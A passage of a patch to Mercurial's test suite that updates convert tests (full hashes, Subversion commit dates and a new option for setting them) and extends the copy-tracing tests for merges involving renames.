x x o | $ mkdir -p cvsrepo/transcoding - $ python <<EOF + $ "$PYTHON" <<EOF > fp = open('cvsrepo/transcoding/file,v', 'wb') > fp.write((b''' > head 1.4; diff --git a/tests/test-convert-filemap.t b/tests/test-convert-filemap.t --- a/tests/test-convert-filemap.t +++ b/tests/test-convert-filemap.t @@ -292,12 +292,12 @@ $ rm -rf source/.hg/store/data/dir/file4 #endif $ hg -q convert --filemap renames.fmap --datesort source dummydest - abort: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !) 
+ abort: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !) abort: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !) [50] $ hg -q convert --filemap renames.fmap --datesort --config convert.hg.ignoreerrors=1 source renames.repo - ignoring: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !) - ignoring: data/dir/file4.i@6edd55f559cd: no match found (reporevlogstore !) + ignoring: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !) + ignoring: data/dir/file4.i@6edd55f559cdce67132b12ca09e09cee08b60442: no match found (reporevlogstore !) ignoring: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !) ignoring: data/dir/file4/index@6edd55f559cd: no node (reposimplestore !) $ hg up -q -R renames.repo diff --git a/tests/test-convert-hg-source.t b/tests/test-convert-hg-source.t --- a/tests/test-convert-hg-source.t +++ b/tests/test-convert-hg-source.t @@ -182,7 +182,7 @@ sorting... converting... 4 init - ignoring: data/b.i@1e88685f5dde: no match found (reporevlogstore !) + ignoring: data/b.i@1e88685f5ddec574a34c70af492f95b6debc8741: no match found (reporevlogstore !) ignoring: data/b/index@1e88685f5dde: no node (reposimplestore !) 3 changeall 2 changebagain diff --git a/tests/test-convert-svn-sink.t b/tests/test-convert-svn-sink.t --- a/tests/test-convert-svn-sink.t +++ b/tests/test-convert-svn-sink.t @@ -54,10 +54,12 @@ 2 2 test a revision: 2 author: test + date: * (glob) msg: modify a file M /a revision: 1 author: test + date: * (glob) msg: add a file A /a A /d1 @@ -95,6 +97,7 @@ 3 3 test b revision: 3 author: test + date: * (glob) msg: rename a file D /a A /b (from /a@2) @@ -131,6 +134,7 @@ 4 4 test c revision: 4 author: test + date: * (glob) msg: copy a file A /c (from /b@3) $ ls a a-hg-wc @@ -167,6 +171,7 @@ 5 5 test . 
revision: 5 author: test + date: * (glob) msg: remove a file D /b $ ls a a-hg-wc @@ -209,6 +214,7 @@ 6 6 test c revision: 6 author: test + date: * (glob) msg: make a file executable M /c #if execbit @@ -247,6 +253,7 @@ 8 8 test newlink revision: 8 author: test + date: * (glob) msg: move symlink D /link A /newlink (from /link@7) @@ -278,6 +285,7 @@ 7 7 test f revision: 7 author: test + date: * (glob) msg: f D /c A /d @@ -315,6 +323,7 @@ 1 1 test d1/a revision: 1 author: test + date: * (glob) msg: add executable file in new directory A /d1 A /d1/a @@ -343,6 +352,7 @@ 2 2 test d2/a revision: 2 author: test + date: * (glob) msg: copy file to new directory A /d2 A /d2/a (from /d1/a@1) @@ -416,21 +426,25 @@ 4 4 test right-2 revision: 4 author: test + date: * (glob) msg: merge A /right-1 A /right-2 revision: 3 author: test + date: * (glob) msg: left-2 M /b A /left-2 revision: 2 author: test + date: * (glob) msg: left-1 M /b A /left-1 revision: 1 author: test + date: * (glob) msg: base A /b @@ -459,10 +473,12 @@ 2 2 test .hgtags revision: 2 author: test + date: * (glob) msg: Tagged as v1.0 A /.hgtags revision: 1 author: test + date: * (glob) msg: Add file a A /a $ rm -rf a a-hg a-hg-wc @@ -494,10 +510,12 @@ 2 2 test exec revision: 2 author: test + date: * (glob) msg: remove executable bit M /exec revision: 1 author: test + date: * (glob) msg: create executable A /exec $ test ! 
-x a-hg-wc/exec @@ -540,11 +558,77 @@ 2 2 test b revision: 2 author: test + date: * (glob) msg: Another change A /b revision: 1 author: test + date: * (glob) msg: Some change A /a $ rm -rf a a-hg a-hg-wc + +Commit dates convertion + + $ hg init a + + $ echo a >> a/a + $ hg add a + adding a/a + $ hg --cwd a ci -d '1 0' -A -m 'Change 1' + + $ echo a >> a/a + $ hg --cwd a ci -d '2 0' -m 'Change 2' + + $ echo a >> a/a + $ hg --cwd a ci -d '2 0' -m 'Change at the same time' + + $ echo a >> a/a + $ hg --cwd a ci -d '1 0' -m 'Change in the past' + + $ echo a >> a/a + $ hg --cwd a ci -d '3 0' -m 'Change in the future' + + $ hg convert --config convert.svn.dangerous-set-commit-dates=true -d svn a + assuming destination a-hg + initializing svn repository 'a-hg' + initializing svn working copy 'a-hg-wc' + scanning source... + sorting... + converting... + 4 Change 1 + 3 Change 2 + 2 Change at the same time + 1 Change in the past + 0 Change in the future + $ svnupanddisplay a-hg-wc 0 + 5 5 test . + 5 5 test a + revision: 5 + author: test + date: 1970-01-01T00:00:03.000000Z + msg: Change in the future + M /a + revision: 4 + author: test + date: 1970-01-01T00:00:01.000000Z + msg: Change in the past + M /a + revision: 3 + author: test + date: 1970-01-01T00:00:02.000000Z + msg: Change at the same time + M /a + revision: 2 + author: test + date: 1970-01-01T00:00:02.000000Z + msg: Change 2 + M /a + revision: 1 + author: test + date: 1970-01-01T00:00:01.000000Z + msg: Change 1 + A /a + + $ rm -rf a a-hg a-hg-wc diff --git a/tests/test-convert.t b/tests/test-convert.t --- a/tests/test-convert.t +++ b/tests/test-convert.t @@ -388,6 +388,23 @@ does not convert tags from the source repo to the target repo. The default is False. + Subversion Destination + ###################### + + Original commit dates are not preserved by default. + + convert.svn.dangerous-set-commit-dates + preserve original commit dates, forcefully setting + "svn:date" revision properties. 
This option is DANGEROUS and + may break some subversion functionality for the resulting + repository (e.g. filtering revisions with date ranges in + "svn log"), as original commit dates are not guaranteed to + be monotonically increasing. + + For commit dates setting to work destination repository must have "pre- + revprop-change" hook configured to allow setting of "svn:date" revision + properties. See Subversion documentation for more details. + options ([+] can be repeated): -s --source-type TYPE source repository type diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1,4 +1,4 @@ -#testcases filelog compatibility changeset sidedata upgraded +#testcases filelog compatibility changeset sidedata upgraded upgraded-parallel ===================================================== Test Copy tracing for chain of copies involving merge @@ -14,11 +14,24 @@ use git diff to see rename + $ cat << EOF >> ./no-linkrev + > #!$PYTHON + > # filter out linkrev part of the debugindex command + > import sys + > for line in sys.stdin: + > if " linkrev " in line: + > print(line.rstrip()) + > else: + > l = "%s *%s" % (line[:6], line[14:].rstrip()) + > print(l) + > EOF + $ chmod +x no-linkrev + $ cat << EOF >> $HGRCPATH > [diff] > git=yes > [command-templates] - > log={rev} {desc}\n + > log={desc}\n > EOF #if compatibility @@ -45,28 +58,45 @@ #endif + $ cat > same-content.txt << EOF + > Here is some content that will be the same accros multiple file. + > + > This is done on purpose so that we end up in some merge situation, were the + > resulting content is the same as in the parent(s), but a new filenodes still + > need to be created to record some file history information (especially + > about copies). 
+ > EOF + $ hg init repo-chain $ cd repo-chain Add some linear rename initialy - $ echo a > a - $ echo b > b - $ echo h > h - $ hg ci -Am 'i-0 initial commit: a b h' + $ cp ../same-content.txt a + $ cp ../same-content.txt b + $ cp ../same-content.txt h + $ echo "original content for P" > p + $ echo "original content for Q" > q + $ echo "original content for R" > r + $ hg ci -Am 'i-0 initial commit: a b h p q r' adding a adding b adding h + adding p + adding q + adding r $ hg mv a c - $ hg ci -Am 'i-1: a -move-> c' + $ hg mv p s + $ hg ci -Am 'i-1: a -move-> c, p -move-> s' $ hg mv c d - $ hg ci -Am 'i-2: c -move-> d' + $ hg mv s t + $ hg ci -Am 'i-2: c -move-> d, s -move-> t' $ hg log -G - @ 2 i-2: c -move-> d + @ i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r And having another branch with renames on the other side @@ -76,15 +106,15 @@ $ hg mv e f $ hg ci -Am 'a-2: e -move-> f' $ hg log -G --rev '::.' - @ 4 a-2: e -move-> f + @ a-2: e -move-> f | - o 3 a-1: d -move-> e + o a-1: d -move-> e | - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Have a branching with nothing on one side @@ -95,13 +125,13 @@ $ hg ci -m 'b-1: b update' created new head $ hg log -G --rev '::.' - @ 5 b-1: b update + @ b-1: b update | - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Create a branch that delete a file previous renamed @@ -112,13 +142,13 @@ $ hg ci -m 'c-1 delete d' created new head $ hg log -G --rev '::.' 
- @ 6 c-1 delete d + @ c-1 delete d | - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Create a branch that delete a file previous renamed and recreate it @@ -132,15 +162,15 @@ $ hg add d $ hg ci -m 'd-2 re-add d' $ hg log -G --rev '::.' - @ 8 d-2 re-add d + @ d-2 re-add d | - o 7 d-1 delete d + o d-1 delete d | - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Having another branch renaming a different file to the same filename as another @@ -153,16 +183,61 @@ $ hg mv g f $ hg ci -m 'e-2 g -move-> f' $ hg log -G --rev '::.' - @ 10 e-2 g -move-> f + @ e-2 g -move-> f + | + o e-1 b -move-> g + | + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s | - o 9 e-1 b -move-> g + o i-0 initial commit: a b h p q r + + $ hg up -q null + +Having a branch similar to the 'a' one, but moving the 'p' file around. + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv t u + $ hg ci -Am 'p-1: t -move-> u' + created new head + $ hg mv u v + $ hg ci -Am 'p-2: u -move-> v' + $ hg log -G --rev '::.' + @ p-2: u -move-> v + | + o p-1: t -move-> u + | + o i-2: c -move-> d, s -move-> t | - o 2 i-2: c -move-> d + o i-1: a -move-> c, p -move-> s | - o 1 i-1: a -move-> c + o i-0 initial commit: a b h p q r + + $ hg up -q null + +Having another branch renaming a different file to the same filename as another + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv r w + $ hg ci -m 'q-1 r -move-> w' + created new head + $ hg mv w v + $ hg ci -m 'q-2 w -move-> v' + $ hg log -G --rev '::.' 
+ @ q-2 w -move-> v | - o 0 i-0 initial commit: a b h + o q-1 r -move-> w + | + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + $ hg up -q null Setup all merge =============== @@ -176,35 +251,37 @@ - rename on one side - unrelated change on the other side + $ case_desc="simple merge - A side: multiple renames, B side: unrelated update" + $ hg up 'desc("b-1")' - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("a-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBAm-0 simple merge - one way' + $ hg ci -m "mBAm-0 $case_desc - one way" $ hg up 'desc("a-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mABm-0 simple merge - the other way' + $ hg ci -m "mABm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - @ 12 mABm-0 simple merge - the other way + @ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - one way + +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ - | o 5 b-1: b update + | o b-1: b update | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -216,12 +293,14 @@ - one deleting the change and recreate an unrelated file after the merge + $ case_desc="simple merge - C side: delete a file with copies history , B side: unrelated update" + $ hg up 
'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBCm-0 simple merge - one way' + $ hg ci -m "mBCm-0 $case_desc - one way" $ echo bar > d $ hg add d $ hg ci -m 'mBCm-1 re-add d' @@ -230,29 +309,29 @@ $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mCBm-0 simple merge - the other way' + $ hg ci -m "mCBm-0 $case_desc - the other way" created new head $ echo bar > d $ hg add d $ hg ci -m 'mCBm-1 re-add d' $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' - @ 16 mCBm-1 re-add d + @ mCBm-1 re-add d | - o 15 mCBm-0 simple merge - the other way + o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ - | | o 14 mBCm-1 re-add d + | | o mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - one way + +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Comparing with a merge re-adding the file afterward @@ -262,84 +341,139 @@ - one with change to an unrelated file - one deleting and recreating the change + $ case_desc="simple merge - B side: unrelated update, D side: delete and recreate a file (with different content)" + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("d-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBDm-0 simple merge - one way' + $ hg ci -m "mBDm-0 $case_desc 
- one way" $ hg up 'desc("d-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mDBm-0 simple merge - the other way' + $ hg ci -m "mDBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - @ 18 mDBm-0 simple merge - the other way + @ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - one way + +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ - | o 8 d-2 re-add d + | o d-2 re-add d | | - | o 7 d-1 delete d + | o d-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Comparing with a merge with colliding rename -------------------------------------------- +Subcase: new copy information on both side +`````````````````````````````````````````` + - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) + $ case_desc="merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f)" + $ hg up 'desc("a-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ hg merge 'desc("e-2")' --tool :union - merging f - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("e-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
(branch merge, don't forget to commit) - $ hg ci -m 'mAEm-0 simple merge - one way' + $ hg ci -m "mAEm-0 $case_desc - one way" $ hg up 'desc("e-2")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 'desc("a-2")' --tool :union - merging f - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("a-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mEAm-0 simple merge - the other way' + $ hg ci -m "mEAm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - @ 20 mEAm-0 simple merge - the other way + @ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 simple merge - one way + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b -move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s | - o 1 i-1: a -move-> c + o i-0 initial commit: a b h p q r + + +Subcase: new copy information on both side with an actual merge happening +````````````````````````````````````````````````````````````````````````` + +- the "p-" branch renaming 't' to 'v' (through 'u') +- the "q-" branch renaming 'r' to 'v' (through 'w') + + $ case_desc="merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content)" 
+ + $ hg up 'desc("p-2")' + 3 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ hg merge 'desc("q-2")' --tool ':union' + merging v + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mPQm-0 $case_desc - one way" + $ hg up 'desc("q-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("p-2")' --tool ':union' + merging v + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mQPm-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' + o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + |\ + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t | - o 0 i-0 initial commit: a b h + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r +Subcase: existing copy information overwritten on one branch +```````````````````````````````````````````````````````````` Merge: - one with change to an unrelated file (b) - one overwriting a file (d) with a rename (from h to i to d) + $ case_desc="simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)" + $ hg up 'desc("i-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg mv h i @@ -347,45 +481,104 @@ created new head $ hg mv --force i d $ hg commit -m "f-2: rename i -> d" - $ hg debugindex d + $ hg debugindex d | ../no-linkrev rev linkrev nodeid p1 p2 - 0 2 169be882533b 000000000000 000000000000 (no-changeset !) - 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !) 
- 1 8 b004912a8510 000000000000 000000000000 - 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !) - 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !) + 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 * ae258f702dfe 000000000000 000000000000 (changeset !) + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) $ hg up 'desc("b-1")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("f-2")' - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mBFm-0 simple merge - one way' + $ hg ci -m "mBFm-0 $case_desc - one way" $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mFBm-0 simple merge - the other way' + $ hg ci -m "mFBm-0 $case_desc - the other way" created new head + $ hg up null --quiet $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - @ 24 mFBm-0 simple merge - the other way + o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - one way + +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ - | o 22 f-2: rename i -> d + | o f-2: rename i -> d + | | + | o f-1: rename h -> i | | - | o 21 f-1: rename h -> i - | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c 
-move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s | - o 1 i-1: a -move-> c + o i-0 initial commit: a b h p q r + + +Subcase: existing copy information overwritten on one branch, with different content) +````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch + + $ case_desc="simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content" + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv r x + $ hg commit -m "r-1: rename r -> x" + created new head + $ hg mv --force x t + $ hg commit -m "r-2: rename t -> x" + $ hg debugindex t | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d74efbf65309 000000000000 000000000000 (no-changeset !) + 1 * 02a930b9d7ad 000000000000 000000000000 (no-changeset !) + 0 * 5aed6a8dbff0 000000000000 000000000000 (changeset !) + 1 * a38b2fa17021 000000000000 000000000000 (changeset !) 
+ $ hg up 'desc("b-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("r-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mBRm-0 $case_desc - one way" + $ hg up 'desc("r-2")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mRBm-0 $case_desc - the other way" + created new head + $ hg up null --quiet + $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))' + o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + |\ + +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + | |/ + | o r-2: rename t -> x + | | + | o r-1: rename r -> x + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t | - o 0 i-0 initial commit: a b h + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r +Subcase: reset of the copy history on one side +`````````````````````````````````````````````` + Merge: - one with change to a file - one deleting and recreating the file @@ -393,8 +586,10 @@ Unlike in the 'BD/DB' cases, an actual merge happened here. So we should consider history and rename on both branch of the merge. 
+ $ case_desc="actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content" + $ hg up 'desc("i-2")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo "some update" >> d $ hg commit -m "g-1: update d" created new head @@ -404,33 +599,35 @@ merging d 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mDGm-0 simple merge - one way' + $ hg ci -m "mDGm-0 $case_desc - one way" $ hg up 'desc("g-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("d-2")' --tool :union merging d 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mGDm-0 simple merge - the other way' + $ hg ci -m "mGDm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - @ 27 mGDm-0 simple merge - the other way + @ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 simple merge - one way + +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d | | - o | 7 d-1 delete d + o | d-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s | - o 1 i-1: a -move-> c - | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r +Subcase: merging a change to a file with a "copy overwrite" to that file from another branch +```````````````````````````````````````````````````````````````````````````````````````````` Merge: - one with change to a file (d) @@ -445,38 +642,43 @@ | | The current code arbitrarily pick one 
side + $ case_desc="merge - G side: content change, F side: copy overwrite, no content change" + $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' --tool :union - merging d - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + merging d (no-changeset !) + 0 files updated, 1 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mFGm-0 simple merge - one way' + $ hg ci -m "mFGm-0 $case_desc - one way" created new head $ hg up 'desc("g-1")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("f-2")' --tool :union - merging d - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + merging d (no-changeset !) + 0 files updated, 1 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) 
(branch merge, don't forget to commit) - $ hg ci -m 'mGFm-0 simple merge - the other way' + $ hg ci -m "mGFm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - @ 29 mGFm-0 simple merge - the other way + @ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 simple merge - one way + +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -491,6 +693,8 @@ In this case, the file keep on living after the merge. So we should not drop its copy tracing chain. + $ case_desc="merge updated/deleted - revive the file (updated content)" + $ hg up 'desc("c-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' @@ -502,7 +706,7 @@ [1] $ hg resolve -t :other d (no more unresolved files) - $ hg ci -m "mCGm-0" + $ hg ci -m "mCGm-0 $case_desc - one way" created new head $ hg up 'desc("g-1")' @@ -516,23 +720,23 @@ [1] $ hg resolve -t :local d (no more unresolved files) - $ hg ci -m "mGCm-0" + $ hg ci -m "mGCm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - @ 31 mGCm-0 + @ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 + +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 6 c-1 delete d + o | c-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b 
